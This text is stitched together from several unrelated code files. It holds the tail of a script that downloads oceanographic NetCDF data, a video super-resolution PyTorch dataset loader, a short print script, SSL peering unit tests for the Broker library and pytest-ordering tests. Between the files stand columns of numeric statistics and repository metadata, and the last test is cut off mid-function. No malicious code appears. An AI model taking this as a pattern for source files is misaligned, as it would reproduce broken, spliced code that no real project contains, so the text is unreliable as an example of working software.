'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp04ospm-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz'
]
fnames = [ 'cp01cnpm',
'cp02pmci',
'cp02pmco',
'cp02pmui',
'cp02pmuo',
'cp03ispm',
'cp04ospm' ]
dataPath = '/scratch2/ivana/data/ooi-pioneer/'
    for url, fname in zip(urls, fnames):
        r = requests.get(url, allow_redirects=True)
        # close the file handle explicitly instead of leaking it
        with open(dataPath + fname + '.nc', 'wb') as f:
            f.write(r.content)
    print("Loaded data in:\n%s" % dataPath)
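# A hedged variant (not in the original script): the same download loop with
# streaming writes and basic error handling, so an HTTP failure does not leave
# a truncated .nc file behind. Assumes the same `urls`, `fnames`, `dataPath`.
def load_data_streaming(urls, fnames, dataPath, chunk_size=1 << 20):
    import os
    os.makedirs(dataPath, exist_ok=True)
    for url, fname in zip(urls, fnames):
        with requests.get(url, stream=True, allow_redirects=True) as r:
            r.raise_for_status()  # abort instead of saving an ERDDAP error page
            with open(os.path.join(dataPath, fname + '.nc'), 'wb') as f:
                for chunk in r.iter_content(chunk_size=chunk_size):
                    f.write(chunk)
    print("Loaded data in:\n%s" % dataPath)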
| 147.275862
| 521
| 0.879653
| 572
| 4,271
| 5.952797
| 0.115385
| 0.164464
| 0.328928
| 0.20558
| 0.888106
| 0.888106
| 0.888106
| 0.888106
| 0.870191
| 0.870191
| 0
| 0.035048
| 0.058066
| 4,271
| 28
| 522
| 152.535714
| 0.811335
| 0.02037
| 0
| 0
| 0
| 0.304348
| 0.887162
| 0.007889
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.130435
| 0.043478
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
fe8da2a1ebf9600771ad7d0c388361d1fce1b3ec
| 15,584
|
py
|
Python
|
codes/data/RealVSR_dataset.py
|
AyeshaSadiqa/thesis
|
761eb0c37acd42707d52d4a6bfabe8ac566d8aa4
|
[
"Apache-2.0"
] | 77
|
2021-08-14T04:43:49.000Z
|
2022-03-08T13:41:10.000Z
|
codes/data/RealVSR_dataset.py
|
AyeshaSadiqa/thesis
|
761eb0c37acd42707d52d4a6bfabe8ac566d8aa4
|
[
"Apache-2.0"
] | 8
|
2021-10-30T14:52:11.000Z
|
2022-03-09T12:44:54.000Z
|
codes/data/RealVSR_dataset.py
|
AyeshaSadiqa/thesis
|
761eb0c37acd42707d52d4a6bfabe8ac566d8aa4
|
[
"Apache-2.0"
] | 7
|
2021-08-22T00:47:44.000Z
|
2022-03-08T10:25:54.000Z
|
import os.path as osp
import random
import pickle
import logging
import numpy as np
import lmdb
import torch
import torch.utils.data as data
import data.util as util
logger = logging.getLogger('base')
class RealVSRDataset(data.Dataset):
"""
Reading the training REDS dataset
key example: 000_00000
GT: Ground-Truth;
LQ: Low-Quality, e.g., low-resolution/blurry/noisy/compressed frames
support reading N LQ frames, N = 1, 3, 5, 7
"""
def __init__(self, opt):
super(RealVSRDataset, self).__init__()
self.opt = opt
# temporal augmentation
self.interval_list = opt['interval_list']
self.random_reverse = opt['random_reverse']
logger.info(
            'Temporal augmentation interval list: [{}], random reverse: {}.'.
format(','.join(str(x) for x in opt['interval_list']), self.random_reverse)
)
self.half_N_frames = opt['N_frames'] // 2
self.GT_root, self.LQ_root = opt['dataroot_GT'], opt['dataroot_LQ']
self.data_type = self.opt['data_type']
        self.LR_input = opt['GT_size'] != opt['LQ_size']  # low resolution inputs
#### directly load image keys
if self.data_type == 'lmdb':
self.paths_GT, _ = util.get_image_paths(self.data_type, opt['dataroot_GT'])
logger.info('Using lmdb meta info for cache keys.')
elif opt['cache_keys']:
logger.info('Using cache keys: {}'.format(opt['cache_keys']))
self.paths_GT = pickle.load(open(opt['cache_keys'], 'rb'))['keys']
else:
raise ValueError('Need to create cache keys (meta_info.pkl) by running [create_lmdb.py]')
# remove some sequences for testing
self.paths_GT = [
v for v in self.paths_GT if v.split('_')[0] not in
['008', '026', '029', '031', '042', '055', '058', '077', '105', '113',
'132', '135', '146', '155', '161', '167', '173', '175', '180', '181',
'189', '194', '195', '226', '232', '237', '241', '242', '247', '256',
'268', '275', '293', '309', '358', '371', '372', '379', '383', '401',
'409', '413', '426', '438', '448', '471', '478', '484', '490', '498']
]
assert self.paths_GT, 'Error: GT path is empty.'
if self.data_type == 'lmdb':
self.GT_env, self.LQ_env = None, None
elif self.data_type == 'img':
pass
else:
raise ValueError('Wrong data type: {}'.format(self.data_type))
def _init_lmdb(self):
self.GT_env = lmdb.open(self.opt['dataroot_GT'], readonly=True, lock=False, readahead=False, meminit=False)
self.LQ_env = lmdb.open(self.opt['dataroot_LQ'], readonly=True, lock=False, readahead=False, meminit=False)
def __getitem__(self, index):
if self.data_type == 'lmdb' and (self.GT_env is None or self.LQ_env is None):
self._init_lmdb()
scale = self.opt['scale']
GT_size = self.opt['GT_size']
key = self.paths_GT[index]
name_a, name_b = key.split('_')
center_frame_idx = int(name_b)
#### determine the neighbor frames
interval = random.choice(self.interval_list)
if self.opt['border_mode']:
direction = 1 # 1: forward; 0: backward
N_frames = self.opt['N_frames']
if self.random_reverse and random.random() < 0.5:
direction = random.choice([0, 1])
if center_frame_idx + interval * (N_frames - 1) > 49:
direction = 0
elif center_frame_idx - interval * (N_frames - 1) < 0:
direction = 1
# get the neighbor list
if direction == 1:
neighbor_list = list(
range(center_frame_idx, center_frame_idx + interval * N_frames, interval)
)
else:
neighbor_list = list(
range(center_frame_idx, center_frame_idx - interval * N_frames, -interval)
)
name_b = '{:05d}'.format(neighbor_list[0])
else:
# ensure not exceeding the borders
while (center_frame_idx + self.half_N_frames * interval > 49) or \
(center_frame_idx - self.half_N_frames * interval < 0):
center_frame_idx = random.randint(0, 49)
# get the neighbor list
neighbor_list = list(
range(center_frame_idx - self.half_N_frames * interval,
center_frame_idx + self.half_N_frames * interval + 1, interval)
)
if self.random_reverse and random.random() < 0.5:
neighbor_list.reverse()
name_b = '{:05d}'.format(neighbor_list[self.half_N_frames])
assert len(neighbor_list) == self.opt['N_frames'], \
'Wrong length of neighbor list: {}'.format(len(neighbor_list))
#### get the GT image (as the center frame)
GT_size_tuple = (3, 1024, 512)
if self.data_type == 'lmdb':
img_GT = util.read_img(self.GT_env, key, GT_size_tuple)
else:
img_GT = util.read_img(None, osp.join(self.GT_root, name_a, name_b + '.png'))
if self.opt['color']: # change color space if necessary
img_GT = util.channel_convert(img_GT.shape[2], self.opt['color'], [img_GT])[0]
#### get LQ images
LQ_size_tuple = (3, 1024, 512)
img_LQ_l = []
for v in neighbor_list:
img_LQ_path = osp.join(self.LQ_root, name_a, '{:05d}.png'.format(v))
if self.data_type == 'lmdb':
img_LQ = util.read_img(self.LQ_env, '{}_{:05d}'.format(name_a, v), LQ_size_tuple)
else:
img_LQ = util.read_img(None, img_LQ_path)
if self.opt['color']: # change color space if necessary
img_LQ = util.channel_convert(img_LQ.shape[2], self.opt['color'], [img_LQ])[0]
img_LQ_l.append(img_LQ)
if self.opt['phase'] == 'train':
C, H, W = LQ_size_tuple # LQ size
# randomly crop
if self.LR_input:
LQ_size = GT_size // scale
rnd_h = random.randint(0, max(0, H - LQ_size))
rnd_w = random.randint(0, max(0, W - LQ_size))
img_LQ_l = [v[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :] for v in img_LQ_l]
rnd_h_HR = int(rnd_h * scale)
rnd_w_HR = int(rnd_w * scale)
img_GT = img_GT[rnd_h_HR:rnd_h_HR + GT_size, rnd_w_HR:rnd_w_HR + GT_size, :]
else:
rnd_h = random.randint(0, max(0, H - GT_size))
rnd_w = random.randint(0, max(0, W - GT_size))
img_LQ_l = [v[rnd_h:rnd_h + GT_size, rnd_w:rnd_w + GT_size, :] for v in img_LQ_l]
img_GT = img_GT[rnd_h:rnd_h + GT_size, rnd_w:rnd_w + GT_size, :]
# augmentation - flip, rotate
img_LQ_l.append(img_GT)
rlt = util.augment(img_LQ_l, self.opt['use_flip'], self.opt['use_rot'])
img_LQ_l = rlt[0:-1]
img_GT = rlt[-1]
# stack LQ images to NHWC, N is the frame number
img_LQs = np.stack(img_LQ_l, axis=0)
# BGR to RGB, HWC to CHW, numpy to tensor
if img_GT.shape[2] == 3:
img_GT = img_GT[:, :, [2, 1, 0]]
img_LQs = img_LQs[:, :, :, [2, 1, 0]]
img_GT = torch.from_numpy(np.ascontiguousarray(np.transpose(img_GT, (2, 0, 1)))).float()
img_LQs = torch.from_numpy(np.ascontiguousarray(np.transpose(img_LQs, (0, 3, 1, 2)))).float()
return {'LQs': img_LQs, 'GT': img_GT, 'key': key}
def __len__(self):
return len(self.paths_GT)
class RealVSRAllPairDataset(data.Dataset):
"""
Reading the training REDS dataset
key example: 000_00000
GT: Ground-Truth;
LQ: Low-Quality, e.g., low-resolution/blurry/noisy/compressed frames
support reading N LQ frames, N = 1, 3, 5, 7
"""
def __init__(self, opt):
super(RealVSRAllPairDataset, self).__init__()
self.opt = opt
# temporal augmentation
self.interval_list = opt['interval_list']
self.random_reverse = opt['random_reverse']
logger.info(
            'Temporal augmentation interval list: [{}], random reverse: {}.'.
format(','.join(str(x) for x in opt['interval_list']), self.random_reverse)
)
self.half_N_frames = opt['N_frames'] // 2
self.GT_root, self.LQ_root = opt['dataroot_GT'], opt['dataroot_LQ']
self.data_type = self.opt['data_type']
        self.LR_input = opt['GT_size'] != opt['LQ_size']  # low resolution inputs
#### directly load image keys
if self.data_type == 'lmdb':
self.paths_GT, _ = util.get_image_paths(self.data_type, opt['dataroot_GT'])
logger.info('Using lmdb meta info for cache keys.')
elif opt['cache_keys']:
logger.info('Using cache keys: {}'.format(opt['cache_keys']))
self.paths_GT = pickle.load(open(opt['cache_keys'], 'rb'))['keys']
else:
raise ValueError('Need to create cache keys (meta_info.pkl) by running [create_lmdb.py]')
# remove some sequences for testing
if opt['remove_list']:
self.remove_list = pickle.load(open(opt['remove_list'], 'rb'))
self.paths_GT = [v for v in self.paths_GT if v.split('_')[0] not in self.remove_list]
logger.info('Remove sequences: {}'.format(self.remove_list))
else:
logger.info('Using all sequences for training.')
assert self.paths_GT, 'Error: GT path is empty.'
if self.data_type == 'lmdb':
self.GT_env, self.LQ_env = None, None
elif self.data_type == 'img':
pass
else:
raise ValueError('Wrong data type: {}'.format(self.data_type))
def _init_lmdb(self):
self.GT_env = lmdb.open(self.opt['dataroot_GT'], readonly=True, lock=False, readahead=False, meminit=False)
self.LQ_env = lmdb.open(self.opt['dataroot_LQ'], readonly=True, lock=False, readahead=False, meminit=False)
def __getitem__(self, index):
if self.data_type == 'lmdb' and (self.GT_env is None or self.LQ_env is None):
self._init_lmdb()
scale = self.opt['scale']
GT_size = self.opt['GT_size']
key = self.paths_GT[index]
name_a, name_b = key.split('_')
center_frame_idx = int(name_b)
#### determine the neighbor frames
interval = random.choice(self.interval_list)
if self.opt['border_mode']:
direction = 1 # 1: forward; 0: backward
N_frames = self.opt['N_frames']
if self.random_reverse and random.random() < 0.5:
direction = random.choice([0, 1])
if center_frame_idx + interval * (N_frames - 1) > 49:
direction = 0
elif center_frame_idx - interval * (N_frames - 1) < 0:
direction = 1
# get the neighbor list
if direction == 1:
neighbor_list = list(
range(center_frame_idx, center_frame_idx + interval * N_frames, interval)
)
else:
neighbor_list = list(
range(center_frame_idx, center_frame_idx - interval * N_frames, -interval)
)
name_b = '{:05d}'.format(neighbor_list[0])
else:
# ensure not exceeding the borders
while (center_frame_idx + self.half_N_frames * interval > 49) or \
(center_frame_idx - self.half_N_frames * interval < 0):
center_frame_idx = random.randint(0, 49)
# get the neighbor list
neighbor_list = list(
range(center_frame_idx - self.half_N_frames * interval,
center_frame_idx + self.half_N_frames * interval + 1, interval)
)
if self.random_reverse and random.random() < 0.5:
neighbor_list.reverse()
name_b = '{:05d}'.format(neighbor_list[self.half_N_frames])
assert len(neighbor_list) == self.opt['N_frames'], \
'Wrong length of neighbor list: {}'.format(len(neighbor_list))
#### get the GT image (as the center frame)
GT_size_tuple = (3, 1024, 512)
img_GT_l = []
for v in neighbor_list:
img_GT_path = osp.join(self.GT_root, name_a, '{:05d}.png'.format(v))
if self.data_type == 'lmdb':
img_GT = util.read_img(self.GT_env, '{}_{:05d}'.format(name_a, v), GT_size_tuple)
else:
img_GT = util.read_img(None, img_GT_path)
if self.opt['color']: # change color space if necessary
img_GT = util.channel_convert(img_GT.shape[2], self.opt['color'], [img_GT])[0]
img_GT_l.append(img_GT)
#### get LQ images
LQ_size_tuple = (3, 1024, 512)
img_LQ_l = []
for v in neighbor_list:
img_LQ_path = osp.join(self.LQ_root, name_a, '{:05d}.png'.format(v))
if self.data_type == 'lmdb':
img_LQ = util.read_img(self.LQ_env, '{}_{:05d}'.format(name_a, v), LQ_size_tuple)
else:
img_LQ = util.read_img(None, img_LQ_path)
if self.opt['color']: # change color space if necessary
img_LQ = util.channel_convert(img_LQ.shape[2], self.opt['color'], [img_LQ])[0]
img_LQ_l.append(img_LQ)
if self.opt['phase'] == 'train':
C, H, W = LQ_size_tuple # LQ size
# randomly crop
if self.LR_input:
LQ_size = GT_size // scale
rnd_h_LQ = random.randint(0, max(0, H - LQ_size))
rnd_w_LQ = random.randint(0, max(0, W - LQ_size))
img_LQ_l = [v[rnd_h_LQ:rnd_h_LQ + LQ_size, rnd_w_LQ:rnd_w_LQ + LQ_size, :] for v in img_LQ_l]
rnd_h_HR = int(rnd_h_LQ * scale)
rnd_w_HR = int(rnd_w_LQ * scale)
img_GT_l = [v[rnd_h_HR:rnd_h_HR + GT_size, rnd_w_HR:rnd_w_HR + GT_size, :] for v in img_GT_l]
else:
rnd_h = random.randint(0, max(0, H - GT_size))
rnd_w = random.randint(0, max(0, W - GT_size))
img_LQ_l = [v[rnd_h:rnd_h + GT_size, rnd_w:rnd_w + GT_size, :] for v in img_LQ_l]
img_GT_l = [v[rnd_h:rnd_h + GT_size, rnd_w:rnd_w + GT_size, :] for v in img_GT_l]
# augmentation - flip, rotate
rlt = [*img_LQ_l, *img_GT_l]
rlt = util.augment(rlt, self.opt['use_flip'], self.opt['use_rot'])
img_LQ_l = rlt[:len(neighbor_list)]
img_GT_l = rlt[len(neighbor_list):]
# stack LQ images to NHWC, N is the frame number
img_LQs = np.stack(img_LQ_l, axis=0)
img_GTs = np.stack(img_GT_l, axis=0)
# BGR to RGB, HWC to CHW, numpy to tensor
        if img_GTs.shape[3] == 3:  # channel check on the stacked frames, not the loop variable
img_GTs = img_GTs[:, :, :, [2, 1, 0]]
img_LQs = img_LQs[:, :, :, [2, 1, 0]]
img_GTs = torch.from_numpy(np.ascontiguousarray(np.transpose(img_GTs, (0, 3, 1, 2)))).float()
img_LQs = torch.from_numpy(np.ascontiguousarray(np.transpose(img_LQs, (0, 3, 1, 2)))).float()
return {'LQs': img_LQs, 'GT': img_GTs, 'key': key}
def __len__(self):
return len(self.paths_GT)
if __name__ == '__main__':
pass
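# Hypothetical usage sketch (keys inferred from __init__/__getitem__ above;
# the paths and sizes below are placeholders, not values from the original repo):
#
#     opt = dict(data_type='img', dataroot_GT='/data/RealVSR/GT',
#                dataroot_LQ='/data/RealVSR/LQ', cache_keys='meta_info.pkl',
#                interval_list=[1], random_reverse=False, N_frames=5,
#                GT_size=128, LQ_size=128, scale=1, border_mode=False,
#                color=None, phase='train', use_flip=True, use_rot=True)
#     dataset = RealVSRDataset(opt)
#     sample = dataset[0]  # {'LQs': (N,C,H,W) tensor, 'GT': (C,H,W) tensor, 'key': str}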
| 44.525714
| 115
| 0.565837
| 2,187
| 15,584
| 3.774577
| 0.115684
| 0.021199
| 0.040703
| 0.021805
| 0.903816
| 0.893883
| 0.887099
| 0.875833
| 0.862629
| 0.862144
| 0
| 0.031521
| 0.303773
| 15,584
| 350
| 116
| 44.525714
| 0.729309
| 0.086756
| 0
| 0.727612
| 0
| 0
| 0.100914
| 0
| 0
| 0
| 0
| 0
| 0.014925
| 1
| 0.029851
| false
| 0.011194
| 0.037313
| 0.007463
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe969d048701d14eed9d369e1417010d01908ad4
| 372
|
py
|
Python
|
favoritethings/favoritethings.py
|
OneOfaKindGeek/mycode
|
bbb4391b333aaa1667314b76393f2102c05a2571
|
[
"Apache-2.0"
] | null | null | null |
favoritethings/favoritethings.py
|
OneOfaKindGeek/mycode
|
bbb4391b333aaa1667314b76393f2102c05a2571
|
[
"Apache-2.0"
] | null | null | null |
favoritethings/favoritethings.py
|
OneOfaKindGeek/mycode
|
bbb4391b333aaa1667314b76393f2102c05a2571
|
[
"Apache-2.0"
] | null | null | null |
print("My favorite movie is Endgame")
print("My favorite videogame is The Witcher 3")
print("My favorite show is whatever is filling time in this COVID-19 boredom")
print("My favorite book series is Mistborn")
print("My favorite anime is Castlevania")
| 37.2
| 68
| 0.827957
| 63
| 372
| 4.888889
| 0.333333
| 0.292208
| 0.097403
| 0.11039
| 0.941558
| 0.941558
| 0.941558
| 0.941558
| 0.941558
| 0.941558
| 0
| 0.019481
| 0.172043
| 372
| 9
| 69
| 41.333333
| 0.980519
| 0
| 0
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
fe98ebad3aab78414e84a0b146dd9629b68b62dc
| 5,772
|
py
|
Python
|
auxil/broker/tests/python/ssl-tests.py
|
hugolin615/zeek-4.0.0-ele420520-spring2021
|
258e9b2ee1f2a4bd45c6332a75304793b7d44d40
|
[
"Apache-2.0"
] | null | null | null |
auxil/broker/tests/python/ssl-tests.py
|
hugolin615/zeek-4.0.0-ele420520-spring2021
|
258e9b2ee1f2a4bd45c6332a75304793b7d44d40
|
[
"Apache-2.0"
] | null | null | null |
auxil/broker/tests/python/ssl-tests.py
|
hugolin615/zeek-4.0.0-ele420520-spring2021
|
258e9b2ee1f2a4bd45c6332a75304793b7d44d40
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import os.path
import broker
def data_path(file):
base = os.path.realpath(__file__)
return os.path.join(os.path.join(os.path.dirname(base), "certs"), file)
class TestSSL(unittest.TestCase):
def check_ping(self, ep1, s1, ep2, s2):
ep2.publish("/test", ["ping"])
(t, d) = s1.get()
self.assertEqual(t, "/test")
self.assertEqual(d[0], "ping")
ep1.publish(t, ["pong"])
(t, d) = s2.get()
self.assertEqual(t, "/test")
self.assertEqual(d[0], "pong")
def test_ssl_auth_success_ca(self):
cfg = broker.Configuration(broker.BrokerOptions())
cfg.openssl_certificate = data_path("cert.1.pem")
cfg.openssl_key = data_path("key.1.pem")
cfg.openssl_cafile = data_path("ca.pem")
with broker.Endpoint(cfg) as ep1, \
broker.Endpoint(cfg) as ep2, \
ep1.make_subscriber("/test") as s1, \
ep2.make_subscriber("/test") as s2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, True)
self.check_ping(ep1, s1, ep2, s2)
def test_ssl_auth_success_ca_pw(self):
cfg = broker.Configuration(broker.BrokerOptions())
cfg.openssl_certificate = data_path("cert.1.pem")
cfg.openssl_key = data_path("key.1.enc.pem")
cfg.openssl_cafile = data_path("ca.pem")
cfg.openssl_passphrase = "12345"
with broker.Endpoint(cfg) as ep1, \
broker.Endpoint(cfg) as ep2, \
ep1.make_subscriber("/test") as s1, \
ep2.make_subscriber("/test") as s2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, True)
self.check_ping(ep1, s1, ep2, s2)
def test_ssl_auth_success_self_signed(self):
cfg = broker.Configuration(broker.BrokerOptions())
cfg.openssl_certificate = data_path("cert.self-signed.pem")
cfg.openssl_key = data_path("key.self-signed.pem")
cfg.openssl_cafile = data_path("cert.self-signed.pem")
with broker.Endpoint(cfg) as ep1, \
broker.Endpoint(cfg) as ep2, \
ep1.make_subscriber("/test") as s1, \
ep2.make_subscriber("/test") as s2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, True)
self.check_ping(ep1, s1, ep2, s2)
def test_ssl_auth_failure_self_signed(self):
cfg1 = broker.Configuration(broker.BrokerOptions())
cfg1.openssl_certificate = data_path("cert.1.pem")
cfg1.openssl_key = data_path("key.1.pem")
cfg1.openssl_cafile = data_path("ca.pem")
cfg2 = broker.Configuration(broker.BrokerOptions())
cfg2.openssl_certificate = data_path("cert.self-signed.pem")
cfg2.openssl_key = data_path("key.self-signed.pem")
cfg2.openssl_cafile = data_path("cert.self-signed.pem")
with broker.Endpoint(cfg1) as ep1, \
broker.Endpoint(cfg2) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
with broker.Endpoint(cfg2) as ep1, \
broker.Endpoint(cfg1) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
def test_ssl_auth_failure_no_auth(self):
cfg1 = broker.Configuration(broker.BrokerOptions())
cfg1.openssl_certificate = data_path("cert.1.pem")
cfg1.openssl_key = data_path("key.1.pem")
cfg1.openssl_cafile = data_path("ca.pem")
cfg2 = broker.Configuration(broker.BrokerOptions())
with broker.Endpoint(cfg1) as ep1, \
broker.Endpoint(cfg2) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
with broker.Endpoint(cfg2) as ep1, \
broker.Endpoint(cfg1) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
def test_ssl_auth_failure_no_ssl(self):
cfg1 = broker.Configuration(broker.BrokerOptions())
cfg1.openssl_certificate = data_path("cert.1.pem")
cfg1.openssl_key = data_path("key.1.pem")
cfg1.openssl_cafile = data_path("ca.pem")
cfg2 = broker.Configuration(broker.BrokerOptions())
with broker.Endpoint(cfg1) as ep1, \
broker.Endpoint(cfg2) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
with broker.Endpoint(cfg2) as ep1, \
broker.Endpoint(cfg1) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
def XXXtest_ssl_auth_failure_ca_pw(self):
cfg = broker.Configuration(broker.BrokerOptions())
cfg.openssl_certificate = data_path("cert.1.pem")
cfg.openssl_key = data_path("key.1.enc.pem")
cfg.openssl_cafile = data_path("ca.pem")
cfg.openssl_passphrase = "WRONG PASSWORD"
with broker.Endpoint(cfg) as ep1, \
broker.Endpoint(cfg) as ep2:
port = ep1.listen("127.0.0.1", 0)
            # TODO: This correctly raises an exception in CAF, but it is
            # unclear where to catch it.
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
if __name__ == '__main__':
unittest.main(verbosity=3)
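# Minimal sketch of the peering pattern the tests above exercise (assumes the
# same certs/ directory next to this file; not part of the original suite):
#
#     cfg = broker.Configuration(broker.BrokerOptions())
#     cfg.openssl_certificate = data_path("cert.1.pem")
#     cfg.openssl_key = data_path("key.1.pem")
#     cfg.openssl_cafile = data_path("ca.pem")
#     with broker.Endpoint(cfg) as ep1, broker.Endpoint(cfg) as ep2, \
#             ep1.make_subscriber("/test") as s1:
#         port = ep1.listen("127.0.0.1", 0)
#         assert ep2.peer("127.0.0.1", port, 0)
#         ep2.publish("/test", ["ping"])
#         topic, data = s1.get()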
| 34.771084
| 77
| 0.587838
| 791
| 5,772
| 4.154235
| 0.120101
| 0.060864
| 0.030432
| 0.036519
| 0.872489
| 0.860012
| 0.8521
| 0.851187
| 0.804626
| 0.78028
| 0
| 0.062292
| 0.27131
| 5,772
| 165
| 78
| 34.981818
| 0.718973
| 0.016112
| 0
| 0.707317
| 0
| 0
| 0.096723
| 0
| 0
| 0
| 0
| 0.006061
| 0.113821
| 1
| 0.073171
| false
| 0.01626
| 0.04878
| 0
| 0.138211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22b47b04e84cc1b8707d921907321abe58d346ef
| 5,423
|
py
|
Python
|
tests/test_ordering.py
|
annuupadhyayPS/pytest-ordering
|
b9b01780be446aa082f88061efcbda32a85e19f8
|
[
"MIT"
] | null | null | null |
tests/test_ordering.py
|
annuupadhyayPS/pytest-ordering
|
b9b01780be446aa082f88061efcbda32a85e19f8
|
[
"MIT"
] | null | null | null |
tests/test_ordering.py
|
annuupadhyayPS/pytest-ordering
|
b9b01780be446aa082f88061efcbda32a85e19f8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import pytest
pytest_plugins = ['pytester']
@pytest.fixture
def item_names_for(testdir):
def _item_names_for(tests_content):
        # run pytest's collection-modification hook to get the items in their final sorted order
items = testdir.getitems(tests_content)
hook = items[0].config.hook
hook.pytest_collection_modifyitems(session=items[0].session,
config=items[0].config, items=items)
return [item.name for item in items]
return _item_names_for
def test_no_marks(item_names_for):
tests_content = """
def test_1(): pass
def test_2(): pass
"""
assert item_names_for(tests_content) == ['test_1', 'test_2']
def test_first_mark(item_names_for):
tests_content = """
import pytest
def test_1(): pass
@pytest.mark.first
def test_2(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_1']
def test_last_mark(item_names_for):
tests_content = """
import pytest
@pytest.mark.last
def test_1(): pass
def test_2(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_1']
def test_first_last_marks(item_names_for):
tests_content = """
import pytest
@pytest.mark.last
def test_1(): pass
@pytest.mark.first
def test_2(): pass
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_3', 'test_1']
def test_order_marks(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=-1)
def test_1(): pass
@pytest.mark.run(order=-2)
def test_2(): pass
@pytest.mark.run(order=1)
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_2', 'test_1']
def test_non_contiguous_positive(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=10)
def test_1(): pass
@pytest.mark.run(order=20)
def test_2(): pass
@pytest.mark.run(order=5)
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_1', 'test_2']
def test_non_contiguous_negative(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=-10)
def test_1(): pass
@pytest.mark.run(order=-20)
def test_2(): pass
@pytest.mark.run(order=-5)
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_1', 'test_3']
def test_non_contiguous_inc_zero(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=10)
def test_1(): pass
@pytest.mark.run(order=20)
def test_2(): pass
@pytest.mark.run(order=5)
def test_3(): pass
@pytest.mark.run(order=-10)
def test_4(): pass
@pytest.mark.run(order=-20)
def test_5(): pass
@pytest.mark.run(order=-5)
def test_6(): pass
@pytest.mark.run(order=0)
def test_7(): pass
"""
assert item_names_for(tests_content) == ['test_7', 'test_3', 'test_1', 'test_2', 'test_5', 'test_4', 'test_6']
def test_non_contiguous_inc_none(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=5)
def test_1(): pass
@pytest.mark.run(order=0)
def test_2(): pass
@pytest.mark.run(order=1)
def test_3(): pass
@pytest.mark.run(order=-1)
def test_4(): pass
@pytest.mark.run(order=-5)
def test_5(): pass
def test_6(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_3', 'test_1', 'test_6', 'test_5', 'test_4']
def test_first_mark_class(item_names_for):
tests_content = """
import pytest
def test_1(): pass
@pytest.mark.first
class TestSuite(object):
def test_3(self): pass
def test_2(self): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_2', 'test_1']
def test_last_mark_class(item_names_for):
tests_content = """
import pytest
@pytest.mark.last
class TestSuite(object):
def test_1(self): pass
def test_2(self): pass
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_1', 'test_2']
def test_first_last_mark_class(item_names_for):
tests_content = """
import pytest
@pytest.mark.last
class TestLast(object):
def test_1(self): pass
def test_2(self): pass
def test_3(): pass
@pytest.mark.first
class TestFirst(object):
def test_4(self): pass
def test_5(self): pass
"""
